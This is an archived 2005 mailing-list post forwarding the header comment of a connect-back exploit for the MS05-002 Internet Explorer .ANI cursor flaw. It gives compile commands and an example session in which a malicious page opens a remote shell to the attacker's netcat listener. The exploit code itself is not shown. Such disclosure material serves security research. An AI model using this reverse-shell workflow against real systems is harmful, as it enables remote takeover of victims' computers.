Fwd: MS05-002 xploit modification - connectback addition

From: Benn Goldman Rivers (benoror_at_gmail.com)
Date: 01/30/05


Date: Sun, 30 Jan 2005 04:59:13 -0600
To: exploits@k-otik.com, contributor@idefense.com, submissions@packetstormsecurity.org, RazaMexicanaVulnList <vuln@raza-mexicana.org>, vuln-dev@securityfocus.com


Filename with greetings ... sorry

On Sun, 30 Jan 2005 00:41:16 -0600, <benoror@gmail.com> wrote:
> /* WC-ms05002-ani-expl-cb.c: 2005-01-30: PUBLIC v.0.2
> *
> * Copyright (c) 2004-2005 WhiskyCoders.
> *
> * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
> * (CAN-2004-1049)
> *
> * WhiskyCoders - http://bennupg.ath.cx
> * Greetz: nitrous, kubaner, cryogen, rowter, dex, beck, and everyone else in the vulnfact.com crew
> *
> * (universal -- for all affected systems)
> * ---------------------------------------------------------------------
> * Notes:
> * This is a mod of houseofdabus (HOD-ms05002-ani-expl.c) exploit.
> * http://www.k-otik.com/exploits/20050123.HOD-ms05002-ani-expl.c.php
> * ---------------------------------------------------------------------
> * Description:
> * A remote code execution vulnerability exists in the way that
> * cursor, animated cursor, and icon formats are handled. An attacker
> * could try to exploit the vulnerability by constructing a malicious
> * cursor or icon file that could potentially allow remote code
> * execution if a user visited a malicious Web site or viewed a
> * malicious e-mail message. An attacker who successfully exploited
> * this vulnerability could take complete control of an affected
> * system.
> *
> * ---------------------------------------------------------------------
> * Patch:
> * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
> *
> * ---------------------------------------------------------------------
> * Tested on:
> * - Windows Server 2003
> * - Windows XP SP1
> * - Windows XP SP0
> * - Windows 2000 SP4
> * - Windows 2000 SP3
> * - Windows 2000 SP2
> *
> * ---------------------------------------------------------------------
> * Compile:
> *
> * Win32/VC++ : cl -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Win32/cygwin: gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> * Linux : gcc -o WC-ms05002-ani-expl-cb WC-ms05002-ani-expl-cb.c
> *
> * ---------------------------------------------------------------------
> * Example:
> *
> **ATTACKER:
> *
> * d00d@whiskybox $ WC-ms05002-ani-expl-cb poc 7778 192.168.0.30
> * <...>
> * [*] Creating poc.ani file ... Ok
> * [*] Creating poc.html file ... Ok
> *
> * d00d@whiskybox $ netcat -l -p 7778 -v
> *
> **VICTIM:
> *
> * C:\> iexplore C:\poc.html
> *
> **ATTACKER:
> * d00d@whiskybox $ netcat -l -p 7778 -v
> * Microsoft Windows 2000 [Version 5.00.2195]
> * (C) Copyright 1985-2000 Microsoft Corp.
> *
> * C:\Documents and Settings\Administrator\Desktop>
> *
> * ---------------------------------------------------------------------
> *
> * This is provided as proof-of-concept code only for educational
> * purposes and testing by authorized individuals with permission to
> * do so.
> *
> */
>
>
>






Relevant Pages

  • SecurityFocus Microsoft Newsletter #445
    ... MICROSOFT VULNERABILITY SUMMARY ... Apple Safari CoreGraphics TrueType Font Handling Remote Code Execution Vulnerability ... Microsoft Windows Argument Validation Local Privilege Escalation Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #313
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Class Package Export Tool Clspack.exe Local Buffer Overflow Vulnerability ... Microsoft PowerPoint Unspecified Remote Unspecified Code Execution Vulnerability ... Microsoft Office Malformed Record Remote Code Execution Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #299
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft Excel File Rebuilding Remote Code Execution Vulnerability ... Microsoft Windows DHCP Client Service Remote Code Execution Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #295
    ... MICROSOFT VULNERABILITY SUMMARY ... Sendmail Malformed MIME Message Denial Of Service Vulnerability ... Microsoft Windows Routing and Remote Access Unspecified Remote Code Execution Vulnerability ...
    (Focus-Microsoft)
  • SecurityFocus Microsoft Newsletter #342
    ... Extended Validation triggers a green address bar in Microsoft IE7, ... BitsCast PubDate Element Remote Denial Of Service Vulnerability ... Microsoft Windows Media Server MDSAuth.DLL ActiveX Control Remote Code Execution Vulnerability ... A remote attacker can exploit this issue to crash the affected application, ...
    (Focus-Microsoft)